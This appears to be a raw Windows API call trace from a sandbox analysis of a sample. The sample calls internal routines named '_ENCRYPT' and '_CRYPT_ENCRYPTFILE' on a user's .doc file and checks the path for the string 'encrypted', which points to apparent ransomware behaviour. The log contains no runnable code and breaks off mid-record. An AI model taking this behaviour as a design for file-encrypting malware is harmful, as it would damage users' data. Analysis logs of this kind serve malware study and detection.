[0035.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0035.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0035.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0035.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0035.910] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0035.910] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0035.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0035.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0035.910] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.910] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0035.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0035.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.910] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0035.910] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.910] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oc", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.910] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="doc", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.910] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".doc", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0035.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0035.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0035.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0035.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0035.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0035.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0035.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0035.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0035.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0035.911] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.911] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.911] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.911] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4ae5b40, ftCreationTime.dwHighDateTime=0x1d5c11a, ftLastAccessTime.dwLowDateTime=0xaaf7b9b0, ftLastAccessTime.dwHighDateTime=0x1d5c47f, ftLastWriteTime.dwLowDateTime=0xaaf7b9b0, ftLastWriteTime.dwHighDateTime=0x1d5c47f, nFileSizeHigh=0x0, nFileSizeLow=0x2926, dwReserved0=0x0, dwReserved1=0x777648, cFileName="sm D80ZGiF.doc", cAlternateFileName="SMD80Z~1.DOC")) returned 0x7c20c0 [0035.911] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0035.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0035.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0035.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0035.911] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.911] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4ae5b40, ftCreationTime.dwHighDateTime=0x1d5c11a, ftLastAccessTime.dwLowDateTime=0xaaf7b9b0, ftLastAccessTime.dwHighDateTime=0x1d5c47f, ftLastWriteTime.dwLowDateTime=0xaaf7b9b0, ftLastWriteTime.dwHighDateTime=0x1d5c47f, nFileSizeHigh=0x0, nFileSizeLow=0x2926, dwReserved0=0x0, dwReserved1=0x777648, cFileName="sm D80ZGiF.doc", cAlternateFileName="SMD80Z~1.DOC")) returned 0x7c20c0 [0035.911] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0035.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0035.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0035.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0035.911] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.911] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.911] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.911] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.911] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.911] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mAiAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AiAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iAINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AINSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NSrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SrD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rD\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="007meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="07meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="meSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eSo66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="So66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="66\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sm D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.914] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.914] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.914] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="80ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.914] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0035.914] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZGiF.doc\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0035.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0035.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0035.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0035.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0035.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0035.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0035.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0035.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.914] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0035.914] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0035.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0035.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.914] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0035.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0035.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.914] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.914] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.914] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oc", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.914] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="doc", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0035.914] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".doc", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0035.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0035.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0035.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0035.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0035.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0035.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0035.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0035.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.915] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.915] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.915] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.915] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0035.915] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.915] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\sm D80ZGiF.doc", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4ae5b40, ftCreationTime.dwHighDateTime=0x1d5c11a, ftLastAccessTime.dwLowDateTime=0xaaf7b9b0, ftLastAccessTime.dwHighDateTime=0x1d5c47f, ftLastWriteTime.dwLowDateTime=0xaaf7b9b0, 